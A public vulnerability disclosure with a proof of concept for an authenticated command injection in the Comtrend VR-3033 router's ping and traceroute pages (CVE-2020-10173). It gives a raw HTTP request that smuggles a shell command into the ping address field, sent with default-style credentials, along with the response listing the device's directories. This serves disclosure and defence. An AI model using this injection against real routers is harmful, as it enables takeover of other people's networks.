扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 |
# Title: Comtrend VR-3033 - Authenticated Command Injection # Date: 2020-02-26 # Author: Author : Raki Ben Hamouda # Vendor: https://us.comtrend.com # Product link: https://us.comtrend.com/products/vr-3030/ # CVE: CVE-2020-10173 The Comtrend VR-3033 is prone to Multiple Authenticated Command Injection vulnerability via ping and traceroute diagnostic page. Remote attackers are able to get full control and compromise the network managed by the router. Note : This bug may exist in other Comtrend routers . =============================================== Product Page : https://us.comtrend.com/products/vr-3030/ Firmware version : DE11-416SSG-C01_R02.A2pvI042j1.d26m Bootloader (CFE) Version : 1.0.38-116.228-1 To reproduce the vulnerability attacker has to access the interface at least with minimum privilege. 1- Open interface 2- click on 'Diagnostic' tab on top. 3- click then on 'Ping' or traceroute 4- on the text input, type 'google.fr;ls - l' 5 - a list of folder names should appear. ############################# POC session Logs : GET /ping.cgi?pingIpAddress=google.fr;ls&sessionKey=1039230114 HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic dXNlcjp1c2Vy Connection: close Referer: http://192.168.0.1/pingview.cmd Upgrade-Insecure-Requests: 1 =====================++RESPONSE++===================== HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Fri, 02 Jan 1970 00:00:26 GMT Content-Type: text/html Connection: close <html><head> <meta HTTP-EQUIV="Pragma" CONTENT='no-cache'> <link rel="stylesheet" href='stylemain.css' type='text/css'> <link rel="stylesheet" href='colors.css' type='text/css'> <script language="javascript" src="util.js"> </script> <script language="javascript"> <!-- hide function btnPing() { var loc = 'ping.cgi?'; with ( document.forms[0] ) { if (pingIpAddress.value.length == 0 ) { return; } loc += 'pingIpAddress=' + pingIpAddress.value; loc += '&sessionKey=1592764063'; } var code = 'location="' + loc + '"'; eval(code); } // done hiding --> </script> </head> <body> <blockquote> <form> <b>Ping </b><br> <br> Send ICMP ECHO_REQUEST packets to network hosts.<br> <br><table border="0" cellpadding="0" cellspacing="0"><tr> <td width="170">Ping IP Address / Hostname:</td> <td width="170"><input type='text' name='pingIpAddress' onkeydown="if(event.keyCode == 13){event.returnValue = false;}"></td> <td width=""><input type='button' onClick='btnPing()' value='Ping'></td> </tr></table><br> <tr> <td>bin </td><br> </tr> <tr> <td>bootfs </td><br> </tr> <tr> <td>data </td><br> </tr> <tr> <td>debug </td><br> </tr> <tr> <td>dev </td><br> </tr> <tr> <td>etc </td><br> </tr> <tr> <td>lib </td><br> </tr> <tr> <td>linuxrc </td><br> </tr> <tr> <td>mnt </td><br> </tr> <tr> <td>opt </td><br> </tr> <tr> <td>proc </td><br> </tr> <tr> <td>sbin </td><br> </tr> <tr> <td>sys </td><br> </tr> <tr> <td>tmp </td><br> </tr> <tr> <td>usr </td><br> </tr> <tr> <td>var </td><br> </tr> <tr> <td>webs </td><br> </tr> </form> </blockquote> </body> </html> ##Same bug with the same way we exploited in ping function can be exploited the same way in traceroute function. =========== ##Timeline : *Bug sent to vendor : 17-02-2020 *No Response after 10 days * Public disclosure: 27-02-020 |
体验盒子
